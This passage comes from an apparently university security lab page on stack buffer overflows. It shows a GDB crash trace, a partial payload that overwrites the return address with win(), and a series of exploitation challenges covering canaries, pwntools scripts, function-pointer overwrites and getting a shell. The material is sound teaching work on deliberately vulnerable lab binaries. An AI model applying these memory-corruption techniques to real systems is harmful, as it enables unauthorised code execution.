  0008| 0xffffd628 --> 0xffffd6bc --> 0xffffd8cb ("XDG_CONFIG_DIRS=/etc/xdg/xdg-ubuntu:/etc/xdg")
  0012| 0xffffd62c --> 0xffffd644 --> 0x0
  0016| 0xffffd630 --> 0x1
  0020| 0xffffd634 --> 0x0
  0024| 0xffffd638 --> 0xf7fb4000 --> 0x1d4d6c
  0028| 0xffffd63c --> 0xf7fe575a (add edi,0x178a6)
  [------------------------------------------------------------------------------]
  Legend: code, data, rodata, value
  Stopped reason: SIGSEGV
  0xdeadbeef in ?? ()

Excellent. Now we can replace ''0xdeadbeef'' with the address of the ''win'' function.

  ...
  # WIN_ADDR is a placeholder: use the address of win() as reported by gdb or nm
  payload += struct.pack('<I', WIN_ADDR)
  ...

  $ cat payload | ./buffer_overflow_ret
  Please leave a message: Nothing to see here
  Well done!
  Segmentation fault (core dumped)

Our job here is done. Now it's time for you to smash some stacks.

Keep in mind that buffer overflows are not the only type of vulnerability, but they are very common.

===== Challenges =====

Before venturing forth, consider the following roadmap when approaching a challenge:
  * disassemble the binary
  * identify the stack buffer
  * identify functions which work with buffers
  * see if there are any mismatches (declared size vs. index used)
  * dynamic analysis in GDB; inject De Bruijn patterns whenever input is read
  * determine offset in buffer
  * write a script which generates a payload to reliably crash/exploit the target
  * keep stdin/connection open for further interaction after obtaining a shell
  * ???
  * PROFIT

Use the following [[http://security.cs.pub.ro/summer-school/res/arc/06-buffer-management-skel.zip|archive]].

==== 01. Parrot ====

Some programs feature a "stack smashing protection" in the form of stack canaries, that is, values kept on the stack which are checked before returning from a function. If the value has changed, the check concludes that stack data has been corrupted during the execution of the current function.

We have implemented our very own ''parrot''. Can you avoid it somehow?

Values are little endian. So if you want to send ''0xabcd'' you would send it as ''\xcd\xab\x00\x00''.

When providing input to a program and wanting to keep the connection to its standard input open, run:

  cat payload - | ./program

Or, if you have a payload generator program such as ''payload.py'', run:

  cat <(python payload.py) - | ./program

==== 02. Indexing ====

More complex programs require some form of protocol or user interaction. This is where the great [[https://github.com/Gallopsled/pwntools|pwntools]] comes in. Here's an interactive script to get you started:

  #!/usr/bin/env python
  from pwn import *

  p = process('./indexing')

  p.recvuntil('Index: ')
  p.sendline() # TODO (must be string)

  # Give value
  p.recvuntil('Value: ')
  p.sendline() # TODO (must be string)

  p.interactive()

Go through GDB when aiming to solve this challenge. As all input values are strings, you can input them at the keyboard and follow their effect in GDB.

You can inspect the behavior of a program for a given input by doing:

  cat payload | strace ./program

That is, you will trace the program being exploited and see ''read()'' or other calls and how they fare for a given input.

==== 03. Smashthestack Level7 ====

Now you can tackle a real challenge. See if you can figure out how you can get a shell from this one.

There's an integer overflow + buffer overflow in the program. What are the four 32-bit values that, multiplied by ''4'', give you, let's say, ''256''?

In order to run a program that receives command line arguments under gdb, you can do the following:

  $ gdb ./main
  gdb$ set args arg1 arg2 arg3
  gdb$ start

==== 04. Neighbourly ====

Let's overwrite a structure's function pointer using a buffer overflow in its vicinity. The principle is the same.

The ''ptext'' field of the structure is a function pointer. Overwrite it with the address of the ''win()'' function.

==== 05. Uninitialized ====

There's something faulty in the program, and it's **not** a buffer overflow. Provide the proper input to the executable and get a shell.

Do **not** use pwntools for this task.

==== 06. Bonus: Uninitialized 2 ====

There's a small update to the ''uninitialized'' executable and you need to update your solution. Use ''ltrace'' to understand what's happening differently.

Create a pwntools-based script to solve both the initial executable and the bonus one.

==== 07. Bonus: Birds ====

Time for a more complex challenge. Be patient and don't speed through it.